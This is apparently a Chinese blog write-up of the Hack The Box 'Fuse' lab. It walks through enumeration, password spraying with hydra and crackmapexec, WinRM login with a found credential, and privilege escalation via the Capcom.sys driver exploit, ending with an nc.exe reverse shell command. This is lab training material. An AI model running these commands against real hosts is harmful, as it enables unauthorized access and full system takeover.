• 【Hack The Box】windows练习-- Fuse


    HTB 学习笔记

    Hack The Box】windows练习-- Fuse


    🔥系列专栏:Hack The Box
    🎉欢迎关注🔎点赞👍收藏⭐️留言📝
    📆首发时间:🌴2022年11月5日🌴
    🍭作者水平很有限,如果发现错误,还望告知,感谢!

    在这里插入图片描述

    信息收集

    53/tcp   open  domain       Simple DNS Plus
    80/tcp   open  http         Microsoft IIS httpd 10.0
    |_http-server-header: Microsoft-IIS/10.0
    |_http-title: Site doesn't have a title (text/html).
    | http-methods: 
    |_  Potentially risky methods: TRACE
    88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2022-11-04 05:15:23Z)
    135/tcp  open  msrpc        Microsoft Windows RPC
    139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
    389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
    445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
    464/tcp  open  kpasswd5?
    593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
    636/tcp  open  tcpwrapped
    3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
    3269/tcp open  tcpwrapped
    5985/tcp  open  wsman
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17

    上面发现的这些端口,既有常见的smb,ldap,rpc,也有winrm,也有80
    所以我们基本确定思路
    通过信息枚举,登陆winrm,而后提权
    这期间可能需要一些爆破模糊测试

    ldap 枚举

    三步走,每一步都正常才可,最终可以枚举用户和域内信息

    ldapsearch -H ldap://10.10.10.161 -x -s base '' "(objectClass=*)" "*" +     可以枚举出一些域信息,构成第二部的dc参数
    ldapsearch -H ldap://10.10.10.161 -x -b DC=htb,DC=local 
    ldapsearch -H ldap://10.10.10.161 -x -b DC=htb,DC=local "(objectClass=person)" |   grep "sAMAccountName:" 
    最后一步枚举用户
    
    • 1
    • 2
    • 3
    • 4

    在这里插入图片描述
    在这里插入图片描述发现啥都没有

    smb枚举

    空绑定,但是啥也出不来
    在这里插入图片描述漏洞也没有
    在这里插入图片描述而且还要密码,估计这个密码得从web上来或者rpc
    在这里插入图片描述

    80webt

    端口
    发现页面有跳转但是访问不到,那就做一个host
    在/etc/hosts
    编辑加入就行/或者像下面直接加上

    echo "10.10.10.193 fuse.fabricorp.local">>/etc/hosts
    
    • 1

    在这里插入图片描述

    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述这是个什么名反正,左边那一列也有
    在这里插入图片描述
    我觉得这歌系统可能有漏洞,因为这是2012的版本
    我要去谷歌搜一下
    在这里插入图片描述有log4j?一会看看,我先把目前的可能的用户名枚举完
    因为需要版本信息
    所以我要枚举一下目录

    pmerton
    sthompson
    bhult
    administrator
    tlavel
    
    • 1
    • 2
    • 3
    • 4
    • 5

    目录爆破

    gobuster dir -u http://fuse.fabricorp.local -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -x htm -t 40
    
    • 1

    在这里插入图片描述
    但是什么也没有枚举出来

    接下来似乎没有什么思路了,但是这个靶场那个的名字叫模糊,我觉得应该要爆破,这是我最后的选择,但是没办法了
    于是就想找一个密码本,账号就用刚才枚举出来的那些

    模糊测试

    cewl http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers > pass.txt
    crackmapexec smb 10.129.2.5 -u user.txt -p pass.txt
    但是爆破的话不建议这么爆
    建议还是hydra
    
    • 1
    • 2
    • 3
    • 4

    在这里插入图片描述

    hydra -L user.txt -P pass.txt 10.129.2.5 smb 
    
    • 1

    然后登陆,发现需要改密码

    smbpasswd -r 10.10.10.193 tlavel 即可在这里插入图片描述但是搞了半天smb啥都没有
    就拿着相同的密码去rpc枚举
    如果显示需要更爱密码====更改密码继续用上面的命令即可

    rpc枚举

    enumdomusers    枚举用户
    enumprinters   枚举打印机
    
    • 1
    • 2

    在这里插入图片描述
    在这里插入图片描述

    winrm登陆

    evil-winrm -i 10.10.10.193 -u svc-print -p '$fab@s3Rv1ce$1' 
    
    • 1

    在这里插入图片描述whoami /priv
    发现权限异常
    在这里插入图片描述
    这里我本来想用烂土豆的,结果搜了一下,发现烂土豆不允许使用域用户
    所以关注SeLoadDrivverPrivilege
    它允许用户加载内核驱动程序并以内核权限执行代码

    SeLoadDrivverPrivilege权限异常

    至于在winrm下的文件传输
    举个例子(下载到靶场)

    upload /root/Desktop/poc/SeLoadDrivverPrivilege/Capcom.sys .
    
    • 1
    1. 下载:(或者在我本机poc里SeLoadDrivverPrivilege这个文件夹)
    ExploitCapcom.exe:
    https://link.zhihu.com/?target=https%3A//github.com/clubby789/ExploitCapcom/releases/download/1.0/ExploitCapcom.exe
    
    Capcom.sys:
    https://github.com/FuzzySecurity/Capcom-Rootkit
    
    2. 执行
    .\ExploitCapcom.exe LOAD C:\Users\svc-print\Documents\Capcom.sys .\ExploitCapcom.exe EXPLOIT whoami
    
    3. 验证
    .\ExploitCapcom.exe EXPLOIT whoami
    5. 反弹shell
    .\ExploitCapcom.exe EXPLOIT "C:\Users\svc-print\Documents\nc.exe 10.10.14.13 4444 -e cmd.exe"
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14

    在这里插入图片描述
    在这里插入图片描述

  • 相关阅读:
    开源无/低代码平台
    vue中使用qrcodejs2-fix生成二维码
    MKS PI V1.0使用说明书
    addIdleHandler代码不执行
    代码随想录刷题|LeetCode 300.最长递增子序列 674. 最长连续递增序列 718. 最长重复子数组
    前端如何写进度条(上传或者下载文件的时候)
    c++的发展史以及如何学习
    商用车市场「跌跌不休」,主动安全「让位」智能驾驶?
    【人工智能Ⅰ】7-KNN & 决策树
    NeRF神经辐射场渲染过程详解,三维重建渲染过程基本原理_光线采样sample_pdf()和光线渲染render_rays ()代码详解
  • 原文地址:https://blog.csdn.net/weixin_65527369/article/details/127686924